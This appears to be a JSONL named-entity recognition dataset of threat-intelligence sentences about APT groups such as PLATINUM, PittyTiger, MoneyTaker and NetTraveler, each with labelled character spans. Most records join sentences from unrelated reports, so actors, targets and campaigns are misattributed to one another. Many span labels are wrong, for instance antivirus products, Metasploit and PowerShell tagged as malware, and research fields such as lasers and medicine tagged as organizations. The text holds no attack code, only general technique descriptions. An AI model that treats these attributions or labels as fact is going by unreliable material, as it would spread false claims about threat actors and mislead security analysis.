select from various capabilities used to surveil and steal information from the victim machine .", "spans": [{"start": 170, "end": 195, "label": "System"}, {"start": 241, "end": 255, "label": "Organization"}, {"start": 258, "end": 264, "label": "Malware"}]} {"text": "The use of weaponized legitimate documents is a longstanding operational standard of this group . 
The first attack started in early July with a ShimRatReporter payload .", "spans": [{"start": 11, "end": 42, "label": "System"}, {"start": 90, "end": 95, "label": "Organization"}, {"start": 144, "end": 159, "label": "Indicator"}]} {"text": "We decided to spend some time to investigate around this malware and found out that it was used exclusively by a single group of attackers . Myanmar has been the target of Mofang 's attacks for years before the campaign related to the sez .", "spans": [{"start": 120, "end": 125, "label": "Organization"}, {"start": 129, "end": 138, "label": "Organization"}, {"start": 172, "end": 178, "label": "Organization"}]} {"text": "The newsnstat.com domain was used earlier in 2015 for previous HANGOVER campaigns , and was then repurposed in December 2015 for the MONSOON campaign . In late September 2015 Mofang used the website of Myanmar 's national airline hosted at www.flymna.com for an attack against an organization in Myanmar .", "spans": [{"start": 175, "end": 181, "label": "Organization"}]} {"text": "Our researches around the malware family revealed the \" Pitty Tiger \" group has been active since 2011 , yet we found traces which makes us believe the group is active since 2010 . In December 2012 Mofang started a campaign against a new target , called ' seg ' for the purpose of this report .", "spans": [{"start": 56, "end": 67, "label": "Organization"}, {"start": 70, "end": 75, "label": "Organization"}, {"start": 152, "end": 157, "label": "Organization"}]} {"text": "The group exploits known vulnerabilities in Microsoft Office products to infect their targets with malware . 
From the configuration it can be determined that the company was running F-Secure Antivirus and Mofang registered the domain to not appear suspicious .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 44, "end": 69, "label": "System"}, {"start": 182, "end": 200, "label": "Malware"}, {"start": 205, "end": 211, "label": "Malware"}]} {"text": "Pitty Tiger group is sometimes using stolen material as spear phishing content to target other persons . In September 2015 Mofang launched another attack .", "spans": [{"start": 0, "end": 17, "label": "Organization"}, {"start": 123, "end": 129, "label": "Organization"}]} {"text": "PittyTiger has also been seen using Heartbleed vulnerability in order to directly get valid credentials . A new version of ShimRat was built on the 7th of September , uploaded to the server and only days later used in a new campaign .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 36, "end": 60, "label": "Vulnerability"}, {"start": 123, "end": 130, "label": "Malware"}]} {"text": "They have also been seen using Heartbleed vulnerability in order to directly get valid credentials . MoneyTaker has primarily been targeting card processing systems , including the AWS CBR ( Russian Interbank System ) and purportedly SWIFT ( US ) .", "spans": [{"start": 31, "end": 55, "label": "Vulnerability"}]} {"text": "One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) . 
Given the wide usage of STAR in LATAM , financial institutions in LATAM could have particular exposure to a potential interest from the MoneyTaker group .", "spans": [{"start": 40, "end": 57, "label": "Organization"}, {"start": 86, "end": 116, "label": "Malware"}, {"start": 159, "end": 172, "label": "Vulnerability"}, {"start": 217, "end": 239, "label": "Organization"}, {"start": 313, "end": 329, "label": "Organization"}]} {"text": "PittyTiger could also use CVE-2014-1761 , which is more recent . In addition to banks , the MoneyTaker group has attacked law firms and also financial software vendors .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 26, "end": 39, "label": "Vulnerability"}, {"start": 80, "end": 85, "label": "Organization"}, {"start": 92, "end": 108, "label": "Organization"}, {"start": 122, "end": 131, "label": "Organization"}]} {"text": "\" PittyTiger \" is a mutex used by the malware . Since that time , the group attacked companies in California , Utah , Oklahoma , Colorado , Illinois , Missouri , South Carolina , North Carolina , Virginia and Florida .", "spans": [{"start": 2, "end": 12, "label": "Organization"}, {"start": 20, "end": 25, "label": "System"}]} {"text": "This RAT is the origin of the attackers ' group name . The first attack in the US that Group-IB attributes to MoneyTaker was conducted in the spring of 2016 : money was stolen from the bank by gaining access to First Data 's \" STAR \" network operator portal .", "spans": [{"start": 5, "end": 8, "label": "System"}, {"start": 30, "end": 39, "label": "Organization"}, {"start": 42, "end": 47, "label": "Organization"}, {"start": 87, "end": 95, "label": "Organization"}, {"start": 185, "end": 189, "label": "Organization"}]} {"text": "Paladin RAT is another remote administration tool used by the Pitty Tiger group . 
The first attack in the US that Group-IB attributes to this group was conducted in the spring of 2016 : money was stolen from the bank by gaining access to First Data 's \" STAR \" network operator portal .", "spans": [{"start": 0, "end": 11, "label": "System"}, {"start": 62, "end": 79, "label": "Organization"}, {"start": 114, "end": 122, "label": "Organization"}, {"start": 212, "end": 216, "label": "Organization"}]} {"text": "Pitty Tiger , like other APT attackers , often use anti-virus \" familiar names \" when registering domains or creating subdomains . In 2017 , the number of MoneyTaker 's attacks has remained the same with 8 US banks , 1 law firm and 1 bank in Russia being targeted .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 25, "end": 28, "label": "Organization"}, {"start": 29, "end": 38, "label": "Organization"}, {"start": 155, "end": 165, "label": "Organization"}, {"start": 209, "end": 214, "label": "Organization"}, {"start": 219, "end": 227, "label": "Organization"}, {"start": 234, "end": 238, "label": "Organization"}]} {"text": "\" Pitty Tiger \" is also a string transmitted in the network communications of the RAT . In 2017 , the number of attacks has remained the same with 8 US banks , 1 law firm and 1 bank in Russia being targeted .", "spans": [{"start": 2, "end": 13, "label": "Organization"}, {"start": 26, "end": 32, "label": "System"}, {"start": 82, "end": 85, "label": "System"}, {"start": 152, "end": 157, "label": "Organization"}, {"start": 162, "end": 170, "label": "Organization"}, {"start": 177, "end": 181, "label": "Organization"}]} {"text": "A recent report documents a group of attackers known as \" PittyTiger \" that appears to have been active since at least 2011 ; however , they may have been operating as far back as 2008 . 
By analyzing the attack infrastructure , Group-IB identified that MoneyTaker group continuously exfiltrates internal banking documentation to learn about bank operations in preparation for future attacks .", "spans": [{"start": 28, "end": 33, "label": "Organization"}, {"start": 37, "end": 46, "label": "Organization"}, {"start": 58, "end": 68, "label": "Organization"}, {"start": 228, "end": 236, "label": "Organization"}, {"start": 253, "end": 269, "label": "Organization"}, {"start": 341, "end": 345, "label": "Organization"}]} {"text": "We have been monitoring the activities of this group and believe they are operating from China . Group-IB reports that MoneyTaker uses both borrowed and their own self-written tools .", "spans": [{"start": 47, "end": 52, "label": "Organization"}, {"start": 97, "end": 105, "label": "Organization"}]} {"text": "This threat group uses a first-stage malware known as Backdoor.APT.Pgift ( aka Troj/ReRol.A ) , which is dropped via malicious documents and connects back to a C2 server . Group-IB has provided Europol and Interpol with detailed information about the MoneyTaker group for further investigative activities as part of our cooperation in fighting cybercrime .", "spans": [{"start": 5, "end": 17, "label": "Organization"}, {"start": 54, "end": 72, "label": "Malware"}, {"start": 172, "end": 180, "label": "Organization"}]} {"text": "By integrating the findings with prior research , it was possible to connect MONSOON directly with infrastructure used by the HANGOVER group via a series of strong connections . In late September 2015 Mofang used the website of Myanmara 's national airline hosted at www.flymna.com for an attack against an organization in Myanmar .", "spans": [{"start": 77, "end": 84, "label": "Organization"}, {"start": 126, "end": 140, "label": "Organization"}]} {"text": "Backdoor.APT.PittyTiger \u2013 This malware is the classic \" PittyTiger \" malware ( PittyTigerV1.0 ) that was heavily used by this group in 2012 - 2013 . 
To control the full operation , MoneyTaker uses a Pentest framework Server .", "spans": [{"start": 0, "end": 23, "label": "System"}, {"start": 56, "end": 66, "label": "Organization"}, {"start": 79, "end": 93, "label": "System"}, {"start": 126, "end": 131, "label": "Organization"}, {"start": 181, "end": 191, "label": "Organization"}, {"start": 199, "end": 223, "label": "Malware"}]} {"text": "Backdoor.APT.PittyTiger1.3 ( aka CT RAT ) \u2013 This malware is likely used as a second-stage backdoor . On it , MoneyTaker install a legitimate tool for penetration testing \u2013 Metasploit .", "spans": [{"start": 0, "end": 26, "label": "Malware"}, {"start": 33, "end": 39, "label": "System"}, {"start": 77, "end": 98, "label": "System"}, {"start": 109, "end": 119, "label": "Organization"}, {"start": 172, "end": 182, "label": "Malware"}]} {"text": "It also appears the attackers use this as second-stage malware . At the end of June 2015 Mofang started its campaign to gather information of a specific target in relation to the sezs : the cpg Corporation .", "spans": [{"start": 20, "end": 29, "label": "Organization"}, {"start": 42, "end": 62, "label": "System"}, {"start": 190, "end": 205, "label": "Organization"}]} {"text": "We have observed the Enfal malware in use since 2011 and in conjunction with Backdoor.APT.Pgift as the payload of a malicious document used in spearphishing attacks . MoneyTaker uses ' fileless ' malware only existing in RAM and is destroyed after reboot .", "spans": [{"start": 21, "end": 34, "label": "System"}, {"start": 77, "end": 95, "label": "Malware"}, {"start": 167, "end": 177, "label": "Organization"}, {"start": 185, "end": 193, "label": "Malware"}]} {"text": "The Pitty Tiger group mostly uses spear phishing in order to gain an initial foothold within the targeted environment . 
To ensure persistence in the system MoneyTaker relies on PowerShell and VBS scripts - they are both difficult to detect by antivirus and easy to modify .", "spans": [{"start": 4, "end": 21, "label": "Organization"}, {"start": 156, "end": 166, "label": "Organization"}, {"start": 177, "end": 187, "label": "Malware"}, {"start": 192, "end": 203, "label": "Malware"}]} {"text": "PittyTiger leverages social engineering to deliver spearphishing emails , in a variety of languages including English , French and Chinese , and email phishing pages to their targets . After successfully infecting one of the computers and gaining initial access to the system , the attackers perform reconnaissance of the local network in order to gain domain administrator privileges and eventually consolidate control over the network .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 21, "end": 39, "label": "Organization"}]} {"text": "PLATINUM has been targeting its victims since at least as early as 2009 , and may have been active for several years prior . MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 125, "end": 138, "label": "Organization"}, {"start": 209, "end": 227, "label": "Malware"}, {"start": 232, "end": 258, "label": "Malware"}, {"start": 299, "end": 303, "label": "Organization"}]} {"text": "This section describes the history , behavior , and tactics of a newly discovered targeted activity group , which Microsoft has code-named PLATINUM . 
This newly observed activity uses a series of redirections and fileless , malicious implementations of legitimate tools to gain access to the targeted systems .", "spans": [{"start": 91, "end": 105, "label": "Organization"}, {"start": 114, "end": 123, "label": "Organization"}, {"start": 139, "end": 147, "label": "Organization"}]} {"text": "Like many such groups , PLATINUM seeks to steal sensitive intellectual property related to government interests , but its range of preferred targets is consistently limited to specific governmental organizations , defense institutes , intelligence agencies , diplomatic institutions , and telecommunication providers in South and Southeast Asia . Unit 42 recently identified a targeted attack against an individual working for the Foreign Ministry of Uzbekistan in China .", "spans": [{"start": 15, "end": 21, "label": "Organization"}, {"start": 24, "end": 32, "label": "Organization"}, {"start": 91, "end": 101, "label": "Organization"}, {"start": 185, "end": 211, "label": "Organization"}, {"start": 214, "end": 232, "label": "Organization"}, {"start": 235, "end": 256, "label": "Organization"}, {"start": 259, "end": 282, "label": "Organization"}, {"start": 289, "end": 316, "label": "Organization"}, {"start": 347, "end": 354, "label": "Organization"}, {"start": 431, "end": 447, "label": "Organization"}]} {"text": "PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . 
Since that time , MoneyTaker attacked companies in California , Utah , Oklahoma , Colorado , Illinois , Missouri , South Carolina , North Carolina , Virginia and Florida .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 82, "end": 102, "label": "Organization"}, {"start": 143, "end": 160, "label": "Vulnerability"}, {"start": 220, "end": 230, "label": "Organization"}]} {"text": "The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . In their Operation Tropic Trooper report , Trend Micro documented the behaviour and functionality of an espionage toolkit with several design similarities to those observed in the various components of KeyBoy .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 83, "end": 103, "label": "Organization"}, {"start": 144, "end": 161, "label": "Vulnerability"}, {"start": 246, "end": 257, "label": "Organization"}, {"start": 307, "end": 324, "label": "Indicator"}, {"start": 405, "end": 411, "label": "Malware"}]} {"text": "LATINUM makes a concerted effort to hide their infection tracks , by self-deleting malicious components , or by using server side logic in ' one shot mode ' where remotely hosted malicious components are only allowed to load once . Our analysis shows that actors attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 69, "end": 103, "label": "System"}, {"start": 118, "end": 135, "label": "System"}, {"start": 276, "end": 283, "label": "Vulnerability"}, {"start": 284, "end": 297, "label": "Vulnerability"}, {"start": 309, "end": 327, "label": "Malware"}]} {"text": "PLATINUM often spear phishes its targets at their non-official or private email accounts , to use as a stepping stone into the intended organization 's network . 
Unit 42 's analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 162, "end": 169, "label": "Organization"}, {"start": 193, "end": 204, "label": "Malware"}, {"start": 218, "end": 225, "label": "Vulnerability"}, {"start": 226, "end": 239, "label": "Vulnerability"}, {"start": 251, "end": 269, "label": "Malware"}]} {"text": "PLATINUM uses custom-developed malicious tools and has the resources to update these applications often to avoid being detected . Our analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 14, "end": 46, "label": "System"}, {"start": 154, "end": 165, "label": "Malware"}, {"start": 179, "end": 186, "label": "Vulnerability"}, {"start": 187, "end": 200, "label": "Vulnerability"}, {"start": 212, "end": 230, "label": "Malware"}]} {"text": "PLATINUM primarily targets its intended victims using spear phishing . In 2016 , Group-IB identified 10 attacks conducted by MoneyTaker , 6 attacks on banks in the US , 1 attack on a US service provider , 1 attack on a bank in the UK and 2 attacks on Russian banks .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 81, "end": 89, "label": "Organization"}, {"start": 151, "end": 156, "label": "Organization"}, {"start": 186, "end": 202, "label": "Organization"}, {"start": 219, "end": 223, "label": "Organization"}, {"start": 259, "end": 264, "label": "Organization"}]} {"text": "PLATINUM configures its backdoor malware to restrict its activities to victims ' working hours , in an attempt to disguise post-infection network activity within normal user traffic . 
If KeyBoy is a single component of a larger espionage toolkit , the developers may have realized that this older , static-key based , configuration encoding algorithm was inadvertently providing a link between disparate components of their malware suite .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 187, "end": 193, "label": "Malware"}, {"start": 318, "end": 350, "label": "Malware"}]} {"text": "PLATINUM does not conduct its espionage activity to engage in direct financial gain , but instead uses stolen information for indirect economic advantages . In 2016 , Group-IB identified 10 attacks conducted by MoneyTaker ; 6 attacks on banks in the US , 1 attack on a US service provider , 1 attack on a bank in the UK and 2 attacks on Russian banks .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 135, "end": 143, "label": "Organization"}, {"start": 167, "end": 175, "label": "Organization"}, {"start": 237, "end": 242, "label": "Organization"}, {"start": 272, "end": 288, "label": "Organization"}, {"start": 305, "end": 309, "label": "Organization"}, {"start": 345, "end": 350, "label": "Organization"}]} {"text": "PLATINUM is known to have used a number of zero-day exploits , for which no security update is available at the time of transmission , in these attempts . The NetTraveler trojan has been known to be used in targeted cyber espionage attacks for more than a decade by nation state threat actors and continues to be used to target its victims and exfiltrate data .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 43, "end": 60, "label": "Vulnerability"}, {"start": 159, "end": 177, "label": "Malware"}]} {"text": "For the initial infection , PLATINUM typically sends malicious documents that contain exploits for vulnerabilities in various software programs , with links or remotely loaded components ( images or scripts or templates ) that are delivered to targets only once . 
The exploit document carrying this alternate KeyBoy configuration also used a decoy document which was displayed to the user after the exploit launched .", "spans": [{"start": 28, "end": 36, "label": "Organization"}, {"start": 268, "end": 284, "label": "Indicator"}, {"start": 309, "end": 315, "label": "Malware"}, {"start": 342, "end": 356, "label": "Indicator"}, {"start": 399, "end": 406, "label": "Vulnerability"}]} {"text": "PLATINUM 's approach toward exploiting vulnerabilities varies between campaigns . Only one incident involving a Russian bank was promptly identified and prevented that is known to Group-IB .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 120, "end": 124, "label": "Organization"}, {"start": 180, "end": 188, "label": "Organization"}]} {"text": "The document , when opened , used an embedded ActiveX control to download a JavaScript file from a remote site that used a previously unknown vulnerability in some versions of Windows ( later designated CVE-2013-7331 ) to read information about the browser 's installed components . This program is designed to capture keystrokes , take screenshots of the user 's desktop and get contents from the clipboard .", "spans": [{"start": 46, "end": 61, "label": "System"}, {"start": 76, "end": 91, "label": "Malware"}, {"start": 203, "end": 216, "label": "Vulnerability"}]} {"text": "When the document was opened in Word , PLATINUM exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer . 
To conduct targeted attacks , MoneyTaker use a distributed infrastructure that is difficult to track .", "spans": [{"start": 32, "end": 36, "label": "System"}, {"start": 39, "end": 47, "label": "Organization"}, {"start": 153, "end": 166, "label": "Vulnerability"}, {"start": 200, "end": 208, "label": "Organization"}, {"start": 312, "end": 322, "label": "Organization"}, {"start": 329, "end": 355, "label": "Malware"}]} {"text": "n one case from 2013 , the target was sent a malicious document through a spear phishing email message . This technique hides the true C2 server from researchers that do not have access to both the rastls.dll and Sycmentec.config files .", "spans": [{"start": 45, "end": 63, "label": "Malware"}, {"start": 135, "end": 137, "label": "System"}, {"start": 198, "end": 208, "label": "Indicator"}, {"start": 213, "end": 235, "label": "Indicator"}]} {"text": "The DLL exploited another previously unknown vulnerability ( designated CVE-2015-2546 ) in the Windows kernel , which enabled it to elevate privileges for the Word executable and subsequently install a backdoor through the application . Hackers use Metasploit to conduct all these activities : network reconnaissance , search for vulnerable applications , exploit vulnerabilities , escalate systems privileges , and collect information .", "spans": [{"start": 4, "end": 7, "label": "System"}, {"start": 72, "end": 85, "label": "Vulnerability"}, {"start": 159, "end": 163, "label": "System"}, {"start": 249, "end": 259, "label": "Malware"}, {"start": 356, "end": 363, "label": "Vulnerability"}]} {"text": "When the document was opened in Word , it exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer . 
Over the years they've used application components from Norman , McAfee and Norton .", "spans": [{"start": 32, "end": 36, "label": "System"}, {"start": 147, "end": 160, "label": "Vulnerability"}, {"start": 194, "end": 202, "label": "Organization"}, {"start": 332, "end": 338, "label": "Organization"}, {"start": 341, "end": 347, "label": "Organization"}, {"start": 352, "end": 358, "label": "Organization"}]} {"text": "In total , PLATINUM made use of four zero-day exploits during these two attack campaigns ( two remote code execution bugs , one privilege escalation , and one information disclosure ) , showing an ability to spend a non-trivial amount of resources to either acquire professionally written zero-day exploits from unknown markets , or research and utilize the zero-day exploits themselves . Recently , Falcon Intelligence observed new activity from MUSTANG PANDA , using a unique infection chain to target likely Mongolia-based victims .", "spans": [{"start": 11, "end": 19, "label": "Organization"}, {"start": 37, "end": 54, "label": "Vulnerability"}, {"start": 289, "end": 306, "label": "Vulnerability"}, {"start": 358, "end": 375, "label": "Vulnerability"}, {"start": 400, "end": 419, "label": "Organization"}, {"start": 478, "end": 493, "label": "Malware"}]} {"text": "Researching this attack and the malware used therein led Microsoft to discover other instances of PLATINUM attacking users in India around August 2015 . 
Throughout the years , the Mofang group has compromised countless servers belonging to government or other Myanmar related organizations , in order to stage attacks .", "spans": [{"start": 57, "end": 66, "label": "Organization"}, {"start": 98, "end": 106, "label": "Organization"}, {"start": 117, "end": 122, "label": "Organization"}, {"start": 240, "end": 250, "label": "Organization"}]} {"text": "In both these campaigns the activity group included remote triggers to deactivate exploitation , with an attempt to conceal the vulnerability , and prevent analysis of the attack . This file requires the target to attempt to open the .lnk file , which redirects the user to a Windows Scripting Component ( .wsc ) file , hosted on an adversary-controlled microblogging page .", "spans": [{"start": 28, "end": 42, "label": "Organization"}, {"start": 234, "end": 243, "label": "Indicator"}, {"start": 276, "end": 283, "label": "System"}]} {"text": "After gaining access to a victim 's computer , PLATINUM installs its own custom-built malware to communicate with the compromised system , issue commands , and move laterally through the network . A report published by Kaspersky Labs in 2011 on NetTraveler also mentions the C2 servers were being hosted by Krypt Technolgies .", "spans": [{"start": 47, "end": 55, "label": "Organization"}, {"start": 73, "end": 93, "label": "System"}, {"start": 219, "end": 233, "label": "Organization"}, {"start": 245, "end": 256, "label": "Malware"}, {"start": 275, "end": 277, "label": "System"}]} {"text": "PLATINUM uses a number of different custom-developed backdoors to communicate with infected computers . Obviously , the developers behind NetTraveler have taken steps to try to hide the malware 's configuration .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 36, "end": 62, "label": "System"}, {"start": 138, "end": 149, "label": "Malware"}]} {"text": "This section describes some of the tools used by the group . 
In this report , we'll review how the actors attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan .", "spans": [{"start": 53, "end": 58, "label": "Organization"}, {"start": 119, "end": 126, "label": "Vulnerability"}, {"start": 127, "end": 140, "label": "Vulnerability"}, {"start": 156, "end": 174, "label": "Malware"}]} {"text": "The lack of any significant evidence of shared code between any of these backdoor families is another clue as to the scope of the resources on which the activity group is able to draw , and the precautions the group is willing and able to take in order to avoid losing its ability to conduct its espionage operations . In this report , we'll review how NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan .", "spans": [{"start": 153, "end": 167, "label": "Organization"}, {"start": 210, "end": 215, "label": "Organization"}, {"start": 353, "end": 364, "label": "Malware"}, {"start": 378, "end": 385, "label": "Vulnerability"}, {"start": 386, "end": 399, "label": "Vulnerability"}, {"start": 415, "end": 433, "label": "Malware"}]} {"text": "In addition to Dipsind and its variants , PLATINUM uses a few other families of custom-built backdoors within its attack toolset . In this report , we'll review how the NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan .", "spans": [{"start": 15, "end": 22, "label": "System"}, {"start": 42, "end": 50, "label": "Organization"}, {"start": 80, "end": 102, "label": "System"}, {"start": 169, "end": 180, "label": "Malware"}, {"start": 194, "end": 201, "label": "Vulnerability"}, {"start": 202, "end": 215, "label": "Vulnerability"}, {"start": 231, "end": 249, "label": "Malware"}]} {"text": "The PLATINUM group has written a few different versions of keyloggers that perform their functions in different ways , most likely to take advantage of different weaknesses in victims ' computing environments . 
Upon successful exploitation , the attachment will install the Trojan known as NetTraveler using a DLL side-loading attack technique .", "spans": [{"start": 4, "end": 18, "label": "Organization"}, {"start": 59, "end": 69, "label": "System"}, {"start": 246, "end": 256, "label": "Indicator"}, {"start": 274, "end": 280, "label": "Malware"}, {"start": 290, "end": 301, "label": "Malware"}, {"start": 310, "end": 326, "label": "Indicator"}]} {"text": "While one family relies on a small number of supported commands and simple shells , the other delves into more convoluted methods of injections , checks , and supported feature sets . NetTraveler has been used to target diplomats , embassies and government institutions for over a decade , and remains the tool of choice by the adversaries behind these cyber espionage campaigns .", "spans": [{"start": 184, "end": 195, "label": "Malware"}, {"start": 220, "end": 229, "label": "Organization"}, {"start": 232, "end": 241, "label": "Organization"}, {"start": 246, "end": 269, "label": "Organization"}]} {"text": "Both groups can set permissions on specific files to Everyone , and work in tandem with the PLATINUM backdoors . WildFire correctly classifies NetTraveler as malicious .", "spans": [{"start": 5, "end": 11, "label": "Organization"}, {"start": 16, "end": 31, "label": "Malware"}, {"start": 92, "end": 110, "label": "System"}, {"start": 113, "end": 121, "label": "Organization"}, {"start": 143, "end": 154, "label": "Malware"}]} {"text": "In particular , this second group also has the capability of dumping users ' credentials using the same technique employed by Mimikatz . 
The NetTraveler group has infected victims across multiple establishments in both the public and private sector including government institutions , embassies , the oil and gas industry , research centers , military contractors and activists .", "spans": [{"start": 28, "end": 33, "label": "Organization"}, {"start": 126, "end": 134, "label": "System"}, {"start": 259, "end": 282, "label": "Organization"}, {"start": 285, "end": 294, "label": "Organization"}, {"start": 301, "end": 321, "label": "Organization"}, {"start": 343, "end": 363, "label": "Organization"}, {"start": 368, "end": 377, "label": "Organization"}]} {"text": "In addition to using several publicly known injection methods to perform this task , it also takes advantage of an obscure operating system feature known as hot patching . Today Kaspersky Lab 's team of experts published a new research report about NetTraveler , which is a family of malicious programs used by APT actors to successfully compromise more than 350 high-profile victims in 40 countries .", "spans": [{"start": 178, "end": 191, "label": "Organization"}, {"start": 249, "end": 260, "label": "Malware"}]} {"text": "One of PLATINUM 's most recent and interesting tools is meant to inject code into processes using a variety of injection techniques . According to Kaspersky Lab 's report , this threat actor has been active since as early as 2004 ; however , the highest volume of activity occurred from 2010 \u2013 2013 .", "spans": [{"start": 7, "end": 15, "label": "Organization"}, {"start": 147, "end": 160, "label": "Organization"}]} {"text": "At a high level , hot patching can transparently apply patches to executables and DLLs in actively running processes , which does not happen with traditional methods of code injection such as CreateRemoteThread or WriteProcessMemory . 
Most recently , the NetTraveler group 's main domains of interest for cyberespionage activities include space exploration , nanotechnology , energy production , nuclear power , lasers , medicine and communications .", "spans": [{"start": 49, "end": 62, "label": "Malware"}, {"start": 192, "end": 210, "label": "Malware"}, {"start": 214, "end": 232, "label": "Malware"}, {"start": 339, "end": 356, "label": "Organization"}, {"start": 359, "end": 373, "label": "Organization"}, {"start": 376, "end": 393, "label": "Organization"}, {"start": 396, "end": 409, "label": "Organization"}, {"start": 412, "end": 418, "label": "Organization"}, {"start": 421, "end": 429, "label": "Organization"}, {"start": 434, "end": 448, "label": "Organization"}]} {"text": "Hot patching is an operating system-supported feature for installing updates without having to reboot or restart a process . In addition , the NetTraveler toolkit was able to install additional info-stealing malware as a backdoor , and it could be customized to steal other types of sensitive information such as configuration details for an application or computer-aided design files .", "spans": [{"start": 19, "end": 53, "label": "System"}, {"start": 58, "end": 76, "label": "Malware"}, {"start": 143, "end": 162, "label": "Malware"}]} {"text": "Multiple Dipsind variants have been identified , all of which are believed to be used exclusively by PLATINUM . 
During Kaspersky Lab 's analysis of NetTraveler , the company 's experts identified six victims that had been infected by both NetTraveler and Red October , which was another cyberespionage operation analyzed by Kaspersky Lab in January 2013 .", "spans": [{"start": 9, "end": 16, "label": "System"}, {"start": 101, "end": 109, "label": "Organization"}, {"start": 119, "end": 132, "label": "Organization"}, {"start": 148, "end": 159, "label": "Malware"}, {"start": 324, "end": 337, "label": "Organization"}]} {"text": "The group 's most frequently used backdoors belong to a malware family that Microsoft has designated Dipsind , although some variants are detected under different names . Kaspersky Lab 's products detect and neutralize the malicious programs and its variants used by the NetTraveler Toolkit , including Trojan-Spy.Win32.TravNet and Downloader.Win32.NetTraveler .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 76, "end": 85, "label": "Organization"}, {"start": 101, "end": 108, "label": "System"}, {"start": 171, "end": 184, "label": "Organization"}, {"start": 271, "end": 290, "label": "Malware"}, {"start": 303, "end": 327, "label": "Malware"}, {"start": 332, "end": 360, "label": "Malware"}]} {"text": "The technique PLATINUM uses to inject code via hot patching was first documented by security researchers in 2013.7 Administrator permissions are required for hot patching , and the technique used by PLATINUM does not attempt to evade this requirement through exploitation . 
Based on Kaspersky Lab 's analysis of NetTraveler 's C&C data , there were a total of 350 victims in 40 countries across including the United States , Canada , United Kingdom , Russia , Chile , Morocco , Greece , Belgium , Austria , Ukraine , Lithuania , Belarus , Australia , Hong Kong , Japan , China , Mongolia , Iran , Turkey , India , Pakistan , South Korea , Thailand , Qatar , Kazakhstan , and Jordan .", "spans": [{"start": 14, "end": 22, "label": "Organization"}, {"start": 199, "end": 207, "label": "Organization"}, {"start": 283, "end": 296, "label": "Organization"}, {"start": 327, "end": 330, "label": "System"}]} {"text": "PLATINUM has used several zero-day exploits against their victims . Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 26, "end": 43, "label": "Vulnerability"}, {"start": 68, "end": 81, "label": "Organization"}, {"start": 105, "end": 121, "label": "Organization"}, {"start": 122, "end": 130, "label": "Vulnerability"}, {"start": 178, "end": 205, "label": "Indicator"}, {"start": 208, "end": 235, "label": "Indicator"}]} {"text": "The technique PLATINUM uses to inject code via hot patching was first documented by security researchers in 2013.7 . In this case , it was a group commonly referred to as \" Nitro \" , which was coined by Symantec in its 2011 whitepaper .", "spans": [{"start": 14, "end": 22, "label": "Organization"}, {"start": 203, "end": 211, "label": "Organization"}]} {"text": "PLATINUM has consistently targeted victims within a small set of countries in South and Southeast Asia . 
Historically , Nitro is known for targeted spear phishing campaigns and using Poison Ivy malware , which was not seen in these attacks .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 183, "end": 201, "label": "Malware"}]} {"text": "PLATINUM has developed or commissioned a number of custom tools to provide the group with access to victim resources . Since at least 2013 , Nitro appears to have somewhat modified their malware and delivery methods to include Spindest and legitimate compromised websites , as reported by Cyber Squared 's TCIRT .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 51, "end": 63, "label": "System"}, {"start": 227, "end": 235, "label": "Malware"}, {"start": 240, "end": 271, "label": "Malware"}, {"start": 289, "end": 311, "label": "Organization"}]} {"text": "Some of the tools used by PLATINUM , such as the port-knocking backdoor , show signs of organized thinking . In July , Nitro compromised a South Korean clothing and accessories manufacturer 's website to serve malware commonly referred to as \" Spindest \" . Of all the samples we've tied to this activity so far noted in this blog , this is the only one configured to connect directly to an IP address for Command and Control ( C2 ) .", "spans": [{"start": 26, "end": 34, "label": "Organization"}, {"start": 244, "end": 252, "label": "Malware"}, {"start": 390, "end": 392, "label": "Indicator"}, {"start": 427, "end": 429, "label": "System"}]} {"text": "Take advantage of native mitigations built into Windows 10 . 
